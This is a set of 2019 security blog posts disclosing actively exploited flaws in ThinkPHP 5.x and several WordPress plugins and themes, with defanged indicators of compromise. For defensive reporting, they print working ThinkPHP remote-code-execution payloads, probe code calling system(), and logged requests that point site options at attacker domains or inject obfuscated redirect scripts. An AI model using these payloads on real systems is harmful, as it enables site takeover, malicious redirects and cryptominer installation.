Category: Vulnerability Disclosure

ThinkPHP 5.x – Remote Code Execution Actively Exploited...

Earlier this year, we noticed an increase in attacks aiming at ThinkPHP. ThinkPHP is a PHP framework that is very popular in Asia. If you keep track of your site’s activity, the following log may look familiar:

POST: /index.php?s=captcha HTTP/1.1
Data: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig

In December 2018, a working exploit was released for the versions v5.0.23 and v5.1.31. Then, ThinkPHP team released a new version partially fixing the problem. Here is a snippet of the patch:

$method = strtoupper($_POST[Config::get('var_method')]); 
- $this->{$this->method}($_POST); 
+ if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) { 
+ $this->method = $method; 
+ $this->{$this->method}($_POST); 
+ }

Remote Code Execution on ThinkPHP

Basically, they filtered the parameter method to only accept legit values since later on the code function filterValue() passes the filter parameter directly to the PHP function call_user_func() leading to a remote code execution (RCE). Unfortunately, after reversing the patch, attackers also found that reaching the filterValue() function is still possible with an even simpler payload:

data: a=system&b=id&_method=filter  (some important data and more payloads were skipped here)

Affected Versions of ThinkPHP

Versions 5.1.x/ 5.2.x are still affected and since there's no strict validation of user input, bots were programmed to use a new variety of payloads to evade WAFs and previous fixes.

Attackers are exploiting this vulnerability to upload cryptominers. The following is the most recent domains hosting malicious binaries:

hxxp:// love[.]thotiana.live/bins/x86[.]bot
hxxp:// fid[.]hognoob[.]se/download[.]exe

Conclusion

As always, we recommend keeping your software up to date and use a WAF as a second layer of protection since sometimes developers fall short of solving security issues.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Apr 8, 2019 by John Castro

Social Warfare Vulnerability Probes

After a recent disclosure of the Social Warfare plugin vulnerability, we’ve seen massive attacks that inject malicious JavaScripts into the plugin options.

The vulnerability has been patched in version 3.5.3 of the plugin, so not all sites with that plugin are now vulnerable. To find actually vulnerable sites, hackers scan the Internet and probe the sites. However, instead of using the file with code that actually changes the settings, they just specify a file with a PHP code that returns a predefined text for vulnerable sites.

Here are some of the URLs of such probe files detected by our firewall:

<pre>hxxp://<strong>thehuglaw[.]com</strong>/cache/wq.txthxxp://<strong>www.fdqyj[.]com</strong>/lang/wp2.txthxxp://<strong>www.fdqyj[.]com</strong>/lang/wp3.txthxxp://<strong>kidsinthehouse[.]com</strong>/all-backup/libraries/share/fonts/tresz.txthxxp://<strong>kidsinthehouse[.]com</strong>/all-backup/libraries/share/fonts/551.txthxxps://<strong>gist.githubusercontent.com/kolzdnoy71</strong>/ef026d1b2587371fdc6b28a9a21249dd/raw/628d8b376d2122580d6fcbc63c41ea9778473b8f/gistfile1.txt...</pre>

They have very simple PHP code inside <pre> tags. For example:

<pre>print(7457737+736723);</pre>

Or

<pre>system('echo dfdffg34dfg')</pre>

Some of such files are hosted on compromised third-party sites and, at this point, some of them have already been removed.

Hacked sites are not the only option used by the attackers. We’ve seen them using Pastebin links (Pastebin removes them after abuse reports). Another option that you can see in the list above, is Github, and specifically their Gist service.

In case of the above Gist link, the user who created it (kolzdnoy71) has joined GitHub just on March 27, 2019.

Mar 29, 2019 by Denis Sinegubko

Multi-Vector Attack in Server Logs

We recently noticed an increase on suspicious requests in our logs which reveal a planned attack against the Social Warfare plugin. Bad actors added this brand new exploit to an existing campaign, which includes other vulnerable plugins and themes, to inject malicious scripts.


Plugins and themes under attack

Some of the Payloads Used by Bots

WordPress GDPR Compliance

145.239.54.77 - action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22siteurl%22%2C%22value%22+%3A%22https%3A%2F%2Fverybeatifulpear .com%2Fjava.js%3Ft%3D2%26%22%7D&security= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Newspaper WP Theme

31.208.43.209 - action=td_ajax_update_panel&wp_option%5Bhome%5D=https%3A%2F%2Fredrentalservice .com [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Social Warfare Plugin

91.134.215.233 - - [Date] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=hxxp://109.234 .34 .22/mv.txt HTTP/1.1"

Smart Google Code Inserter

1.208.43.209 - action=savegooglecode&sgcgoogleanalytic=%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+...skipped...+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E&sgcwebtools= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"code redirects to hxxps://redrentalservice[.]com/?t4

Education WP Theme

34.194.221.173 - action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=X%3C%2Fscript%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+114%2C+101%2C+110%2C+116%2C+97%2C+108%2C+115%2C+101%2C+114%2C+118%2C+105%2C+99%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+63%2C+116%2C+52%2C...skipped...97%2C+59%2C+32%2C+119%2C+105%2C+110%2C+100%2C+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E%3Cscript%3E "POST /wp-admin/admin-ajax.php

Malicious Domains and IPs:

IPs:

31.208.43.20991.134.215.23334.194.221.173128.199.114.0162.243.1.231145.239.54.77185.136.85.47222.73.242.180109.234.34.22

URLs:

hxxps://redrentalservice[.]com/tpn1.jshxxp://raiserate[.]com/mv.txthxxp://109.234 .34 .22/mv.txthxxps://verybeatifulpear[.]comhxxps://blueeyeswebsite[.]comhxxp://r-y-p[.]org/options.txthxxps://teutorrent.com/wp-includes/js/javascript-mini.js
Mar 25, 2019 by John Castro